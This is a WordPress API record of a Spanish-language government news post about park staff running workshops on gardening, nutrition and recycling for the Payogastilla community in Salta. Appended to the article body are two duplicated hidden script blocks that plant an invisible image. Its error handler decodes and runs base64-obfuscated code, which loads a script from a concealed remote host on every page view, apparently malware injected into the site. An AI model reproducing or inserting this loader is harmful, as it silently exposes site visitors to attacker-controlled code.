{"id":2734,"date":"2023-06-15T11:09:06","date_gmt":"2023-06-15T14:09:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2734"},"modified":"2025-08-14T00:15:00","modified_gmt":"2025-08-14T03:15:00","slug":"equipo-de-los-parques-urbanos-compartio-saberes-con-la-comunidad-de-payogastilla","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2734","title":{"rendered":"Equipo de los Parques Urbanos comparti\u00f3 saberes con la comunidad de Payogastilla"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b90431\"><em>Ni\u00f1os y adultos de Payogastilla participaron de talleres sobre huertas org\u00e1nicas, alimentaci\u00f3n saludable y gesti\u00f3n de residuos, los mismos estuvieron a cargo del equipo de los Parques Urbanos<\/em><\/h4>\n\n\n\n<p>Un equipo de los Parques Urbanos trabaj\u00f3 con ni\u00f1os y adultos de la comunidad de Payogastilla en temas relacionados con separaci\u00f3n de residuos y la creaci\u00f3n de una huerta org\u00e1nica. El objetivo del encuentro fue compartir herramientas para trabajar con la gesti\u00f3n de residuos, el cultivo para contar con alimentos de calidad.<\/p>\n\n\n\n<p>La administradora de los Parques Urbanos del Ministerio de Turismo y Deportes&nbsp;<strong>Eleonora Gallardo<\/strong>&nbsp;destac\u00f3 que el proyecto surgi\u00f3 a partir de un encuentro con&nbsp;<strong>Julia Toyos de Siilu Wasi<\/strong>&nbsp;&#8211; un glamping en Payogastilla &#8211; en el marco del programa \u201cSalta, por un destino sostenible\u201d, un Programa de respuestas y propuestas frente a los desaf\u00edos por los impactos de la huella tur\u00edstica y el cambio clim\u00e1tico en Salta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7526-equipo-de-los-parques-urbanos-compartio-saberes-con-la-comunidad-de-payogastilla.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7526-equipo-de-los-parques-urbanos-compartio-saberes-con-la-comunidad-de-payogastilla.jpeg\" alt=\"Equipo de los Parques Urbanos comparti\u00f3 saberes con la comunidad de Payogastilla\" width=\"-246\" height=\"-184\"\/><\/a><\/figure><\/div>\n\n\n<p>Gallardo se\u00f1al\u00f3 que desde el parque se dise\u00f1aron las actividades y se articul\u00f3 con Siilu Wasi para trabajar con la comunidad durante dos d\u00edas. Las actividades estuvieron a cargo de Betina Gonz\u00e1lez, Responsable de huerta y vivero; Ingeniero en Recursos Naturales &nbsp;y Medio Ambiente Ignacio Irigoyen; Cecilia Alderete, Responsable Programa Eduparque \u2013 Eco canje y Laura Geretis Estudiante del \u00faltimo a\u00f1o de la carrera de Nutrici\u00f3n. &nbsp;<\/p>\n\n\n\n<p>De los talleres participaron 13 ni\u00f1os de la Escuela plurigrado Nro 4387 \u201cPastorcito de F\u00e1tima\u201d y 15 adultos quienes trabajaron sobre separaci\u00f3n de residuos, diferencias entre basura y residuos, y el circuito reducir &#8211; reutilizar \u2013 reciclar. Asimismo, el equipo de los Parques ofreci\u00f3 informaci\u00f3n acerca de las caracter\u00edsticas de materiales para reutilizar y reciclar y brind\u00f3 un taller de reutilizaci\u00f3n y reciclaje.<\/p>\n\n\n\n<p>Otro de los temas abordados fue lo relacionado con la huerta: preparaci\u00f3n de la tierra, elaboraci\u00f3n de alm\u00e1cigos, siembra directa, cuidados b\u00e1sicos \/compost\/ verduras de estaci\u00f3n y se ofreci\u00f3 una charla sobre alimentaci\u00f3n saludable. Por otra parte se abordaron conceptos acerca de la importancia de tener una huerta org\u00e1nica y los beneficios que traduce esto en nuestra salud.<\/p>\n\n\n\n<p>Las dos jornadas permitieron un encuentro con la comunidad que fue facilitado por Siilu Wasi que brind\u00f3 apoyo y log\u00edstica al personal del Parque que se traslad\u00f3 a Payogastilla.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ni\u00f1os y adultos de Payogastilla participaron de talleres sobre huertas org\u00e1nicas, alimentaci\u00f3n saludable y gesti\u00f3n de residuos, los mismos estuvieron a cargo del equipo de los Parques Urbanos Un equipo de los Parques Urbanos trabaj\u00f3 con ni\u00f1os y adultos de la comunidad de Payogastilla en temas relacionados con separaci\u00f3n de residuos y la creaci\u00f3n de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2735,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[10],"tags":[],"class_list":{"0":"post-2734","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-colaboradores"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2734"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2734"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2734\/revisions"}],"predecessor-version":[{"id":7057,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2734\/revisions\/7057"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2735"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}